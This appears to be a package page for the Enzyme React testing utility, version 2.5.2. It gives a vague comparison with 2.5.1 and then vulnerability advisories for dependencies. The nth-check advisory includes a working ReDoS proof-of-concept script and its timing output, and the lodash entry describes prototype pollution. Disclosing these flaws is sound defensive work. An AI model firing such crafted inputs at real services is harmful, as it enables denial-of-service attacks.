Enzyme version 2.5.2 introduces subtle yet potentially impactful changes compared to its predecessor, 2.5.1, focusing on improved utility and developer experience. Both versions serve as crucial JavaScript testing utilities for React, empowering developers to write robust and reliable tests for their React components. One key difference lies in the dependencies. Version 2.5.2 adds "function.prototype.name", "object.entries", and "object.values" along with "uuid" and "in-publish" as dependencies. This enhancement suggests a focus on broader JavaScript environment support and potentially improved handling of object properties, benefiting developers working with diverse React setups.. These dependencies may allow for advanced control and observation capabilities during testing.
Both versions provide a rich set of tools for traversing and manipulating React component output, simulating user interactions, and making assertions about component behavior. Developers can leverage Enzyme to write unit, integration, and end-to-end tests, ensuring their React applications are performant and bug-free. With peer dependency on React versions ranging from 0.13.x to 15.x, both 2.5.1 and 2.5.2 aim for widespread compatibility. Therefore, upgrading from 2.5.1 to 2.5.2 could involve assessing the impact of the new dependency and whether it aligns with your project's existing toolchain. Carefully consider these dependency updates when choosing between versions for your testing suite.
All the vulnerabilities related to the version 2.5.2 of the package
Inefficient Regular Expression Complexity in nth-check
There is a Regular Expression Denial of Service (ReDoS) vulnerability in nth-check that causes a denial of service when parsing crafted invalid CSS nth-checks.
The ReDoS vulnerabilities of the regex are mainly due to the sub-pattern \s*(?:([+-]?)\s*(\d+))? with quantified overlapping adjacency and can be exploited with the following code.
Proof of Concept
// PoC.js
var nthCheck = require("nth-check")
for(var i = 1; i <= 50000; i++) {
var time = Date.now();
var attack_str = '2n' + ' '.repeat(i*10000)+"!";
try {
nthCheck.parse(attack_str)
}
catch(err) {
var time_cost = Date.now() - time;
console.log("attack_str.length: " + attack_str.length + ": " + time_cost+" ms")
}
}
The Output
attack_str.length: 10003: 174 ms
attack_str.length: 20003: 1427 ms
attack_str.length: 30003: 2602 ms
attack_str.length: 40003: 4378 ms
attack_str.length: 50003: 7473 ms
Prototype Pollution in lodash
Versions of lodash prior to 4.17.19 are vulnerable to Prototype Pollution. The functions pick, set, setWith, update, updateWith, and zipObjectDeep allow a malicious user to modify the prototype of Object if the property identifiers are user-supplied. Being affected by this issue requires manipulating objects based on user-provided property values or arrays.
This vulnerability causes the addition or modification of an existing property that will exist on all objects and may lead to Denial of Service or Code Execution under specific circumstances.